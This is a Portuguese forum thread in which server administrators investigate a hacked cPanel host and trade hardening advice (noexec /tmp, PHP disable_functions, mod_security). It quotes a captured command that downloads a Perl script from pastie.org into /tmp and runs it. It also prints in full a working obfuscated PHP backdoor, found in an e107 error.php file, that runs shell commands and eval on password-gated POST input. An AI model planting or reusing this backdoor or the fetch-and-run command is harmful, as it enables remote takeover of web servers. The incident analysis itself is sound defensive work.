[Insert]

Hoje finalmente consegui algo mais concreto sobre aqueles ataques onde sao executados scripts perl etc...

vejam:
sh -c wget http://pastie.org/1013782.txt -O /tmp/bash.pl;perl /tmp/bash.pl 2>&1 3>&1

Como sera que isso foi executado? alguem tem ideia de por onde o malvado rodou a sequencia de comandos? tipo sera que foi usando aquela tatica antiga de incluir um arquivo txt dentro de u site com quarystring mal configurado? ou outra forma?

[alancb]

vc tem shell aberto aos clientes?

ou não bloqueia as funções de sistema no shell_exec do PHP?

[romerob]

Hoje finalmente consegui algo mais concreto sobre aqueles ataques onde sao executados scripts perl etc...

vejam:
sh -c wget http://pastie.org/1013782.txt -O /tmp/bash.pl;perl /tmp/bash.pl 2>&1 3>&1

Como sera que isso foi executado? alguem tem ideia de por onde o malvado rodou a sequencia de comandos? tipo sera que foi usando aquela tatica antiga de incluir um arquivo txt dentro de u site com quarystring mal configurado? ou outra forma?

tu axou isso onde ? no bash_history ?
pq ele pode executar isso via web tbm...se foi viz web.. da uma olhada no teu modsec.

flw

[little_oak]

LABEL=/tmp /tmp ext3 noexec,nosuid,nodev 1 2
Esse é o ideal para o /tmp em EXT3 de users cpanel.
No fstab!

This post has been edited by little_oak: 24 junho 2010 - 05:08

[Insert]

Entao recebi alerta de centenas de processos do meu sistema de monitoramento ai fui ver tinha varios xXx rodando e rodei um ps aux | grep LOGIN > log.txt ai pegou estas linhas tambme acredito que no momento que esta executando.

Eu deixo o shell_exec liberado sim, no mod sec nao vai mostrar nada pois foi ececutado o comando, por isso quero saber por onde foi executado, mas deve ter sido via PHP vou buscar por scritps suspeitos na conta do user.

[Insert]

Acho que achei o arquivo de onde foi executado, o site usa algum CMS parece que se chama e107 ai tem um arquivo chamado error.php e numa parte dele tem o codigo abaixo:

CODE

# grep 'shell_exec' * -R
error.php:$ask_or_not_lex = create_function("\$r","\$zxcv_bd=pack(\"c*\",98,97,115,101,54,52,95,100,101,99,111,100,101); \$zxcv_s=pack(\"c*\",115,116,114,108,101,110);\$zxcv_k=pack(\"c*\",119,117,122,97,107,101,121);\$r=\$zxcv_bd(\$r);for(\$i=0;\$i<\$zxcv_s(\$r);\$i++)\$r[\$i]=chr(ord(\$r[\$i])^ord(\$zxcv_k[\$i%(\$zxcv_s(\$zxcv_k))]));return \$r;");$qwerty_xyz=pack("c*",119,117,122,97);if(isset($_POST[$qwerty_xyz])&&$ask_or_not_lex($_POST[$qwerty_xyz])==pack("c*",50,50,101,55,54,53,101,51,53,52,48,50,52,102,101,55)){if (isset($_POST["shellcmd"])) {func1_xyz($ask_or_not_lex($_POST["shellcmd"]));}if (isset($_POST["evalcmd"])) {func2_xyz($ask_or_not_lex($_POST["evalcmd"]));}exit;}function func1_xyz($cmd){if(ini_get("safe_mode"))die("wuzaerror: safe_mode on");if(strpos(ini_get("disable_functions"),"exec"))die("wuzaerror: exec disabled");$cmdOut=shell_exec($cmd);echo"<pre>$cmdOut</pre>\n";}function func2_xyz($phpcode){echo"<pre>";echo eval($phpcode);echo"</pre>\n";}

O que acham?

Alguem sabe como criar uma regra no mod_sec para metodo POST para bloquear o $_POST["shellcmd"] e $_POST["evalcmd"] ?

This post has been edited by Insert: 24 junho 2010 - 05:43

[little_oak]

No usr/local/lib/php.ini procura pela linha:

disable_functions =

Insere depois do "=" as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Depois salva e reinicia seu apache.

Problema deverá estar sanado

[staticx]

Pelo menos já excluiram o codigo do exploit php,

http://pastie.org/1013782.txt

[Insert]

Pra mudar o /tmp para noexec tem que reinciar? Tem como aplicar sem reiniciar?

[Deee_Carlos]

Se vc precisa liberar shell_exec para algumas contas faça isso:
http://mawan.ind.ws/tagged-%E2%80%98suhosi...klist%E2%80%99/

Não deixe liberado pra todos.

As regras padrão do modsec já são boas d+.

[Juliano P]

Dá um mount -o remount,noexec,nosuid /tmp

Daí nao precisa rebutar. Lembra de alterar o /etc/fstab tambem.

[duranduran]

No usr/local/lib/php.ini procura pela linha:

disable_functions =

Insere depois do "=" as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Depois salva e reinicia seu apache.

Problema deverá estar sanado

Isso já previne muitos dos possíveis problemas.

[little_oak]

Juliano, precisa disso tudo não velho:

/scripts/securetmp

pronto!

This post has been edited by little_oak: 08 julho 2010 - 11:15